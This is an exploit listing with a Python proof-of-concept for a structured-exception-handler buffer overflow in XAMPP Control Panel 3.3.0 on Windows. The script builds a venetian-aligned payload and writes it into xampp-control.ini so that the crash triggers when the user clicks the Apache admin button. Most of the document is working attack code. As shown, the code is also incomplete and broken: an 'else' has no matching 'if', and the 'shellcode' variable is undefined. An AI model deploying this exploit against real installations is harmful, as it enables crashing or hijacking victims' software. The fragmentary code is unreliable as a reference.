Exploits / Vulnerability Discovered : 2024-02-19 |
Type : dos |
Platform : windows
This exploit / vulnerability Xampp buffer overflow poc is for educational purposes only and if it is used you will do on your own risk!
# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"
# 2.- Open the application (xampp-control.exe)
# 3.- Click on the "admin" button in front of Apache service.
# 4.- Profit
# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/
# Greetingz to EMU TEAM (¬‿¬)⩙
from pwn import *
import shutil
import os.path
buffer = "\x41" * 268 # 268 bytes to fill the buffer
nseh = "\x59\x71" # next SEH address — 0x00590071 (a harmless padding)
seh = "\x15\x43" # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ;
padd = "\x71" * 0x55 # padding
eax_align = "\x47" # venetian pad/align
eax_align += "\x51" # push ecx
eax_align += "\x71" # venetian pad/align
eax_align += "\x58" # pop eax -> eax = 0019e1a0
eax_align += "\x71" # venetian pad/align
eax_align += "\x05\x24\x11" # add eax,0x11002300
eax_align += "\x71" # venetian pad/align
eax_align += "\x2d\x11\x11" # sub eax,0x11001100 -> eax = 0019F3DC
eax_align += "\x71" # venetian pad/align
eax_align += "\x50" # push eax
eax_align += "\x71" # pad to align the following ret
eax_align += "\xc3"; # ret into eax?
print("[!] Backup file found. Generating the POC file...")
pass
else:
# create backup
try:
shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")
print("[+] Creating backup for xampp-control.ini...")
print("[+] Backup file created!")
except Exception as e:
print("[!] Failed creating a backup for xampp-control.ini: ", e)
try:
# Create the new file
with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:
file.write(f"""[Common]
Edition=
Editor=
Browser={shellcode}